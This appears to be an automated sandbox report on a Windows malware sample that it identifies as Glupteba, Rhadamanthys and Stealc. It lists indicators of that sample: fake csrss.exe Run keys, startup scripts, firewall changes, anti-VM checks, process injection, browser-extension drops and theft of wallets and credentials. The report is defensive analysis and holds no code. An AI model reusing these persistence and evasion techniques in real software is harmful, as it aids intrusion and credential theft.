Analysis Overview
SHA256
8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d
Threat Level: Known bad
The file 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d was found to be: Known bad.
Malicious Activity Summary
Glupteba payload
Rhadamanthys
Glupteba
Suspicious use of NtCreateUserProcessOtherParentProcess
Modifies firewall policy service
Stealc
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Blocklisted process makes network request
Modifies Windows Firewall
Downloads MZ/PE file
Executes dropped EXE
Reads user/profile data of local email clients
Drops startup file
Themida packer
Checks BIOS information in registry
Reads user/profile data of web browsers
Loads dropped DLL
Reads data files stored by FTP clients
Checks computer location settings
UPX packed file
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates connected drives
Adds Run key to start application
Checks whether UAC is enabled
Drops Chrome extension
Manipulates WinMonFS driver.
Legitimate hosting services abused for malware hosting/C2
Drops desktop.ini file(s)
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Launches sc.exe
Checks for VirtualBox DLLs, possible anti-VM trick
Unsigned PE
Program crash
Enumerates physical storage devices
Checks processor information in registry
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Modifies system certificate store
Uses Task Scheduler COM API
Runs ping.exe
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-28 14:21
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-28 14:21
Reported
2024-03-28 14:23
Platform
win10v2004-20240226-en
Max time kernel
149s
Max time network
145s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe | N/A |
Rhadamanthys
Stealc
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5084 created 2512 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\system32\sihost.exe |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\un4.0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6C5vrw9HlmBbodwnSru7JCve.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nq6HrOPNQV3AaiTZ2ENszitk.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zdUBOSEBG9eSDmyFgN1uKQWG.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pwi2TsGcdAGdwOcS1B3eh5H5.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rfMtcSilGcz9WSg5R9vEYI1Y.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\26ZY1zErGGTZoLBKBy5Lpa8v.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M67GjMBrsbsHZTc6qTnNvMHQ.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8iwRl3OdyFG6LeZYMrXZXLBc.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sb771El5hpTNkkzOaJIpPwPM.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QPMwbWVY1JbuAE8Mag8boWCx.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYaLwPfN6vuiz6R1FwtbMxQK.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4204 set thread context of 1512 | N/A | C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe |
| PID 4912 set thread context of 5084 | N/A | C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File created | C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\NhgXboc.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File created | C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\AZEYcNv.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File created | C:\Program Files (x86)\mVqQIGUXDOgrC\gvVUloZ.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File created | C:\Program Files (x86)\gbPxNkbXHfUn\cqdpDDd.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File created | C:\Program Files (x86)\yvWovCiVU\amDviS.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File created | C:\Program Files (x86)\mVqQIGUXDOgrC\AoTCTed.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File created | C:\Program Files (x86)\yvWovCiVU\JZfiWJf.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File created | C:\Program Files (x86)\LCifMpYymZWU2\eYZkXIj.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
| File created | C:\Program Files (x86)\LCifMpYymZWU2\ZadmzDkveihSi.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe | N/A |
| File created | C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe | N/A |
| File opened for modification | C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\mRaseIvrfxDtBOYKW.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\eGwAoTnpAObQfPU.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\FTXCzbcEvROqagNdd.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\un4.0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\un4.0.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
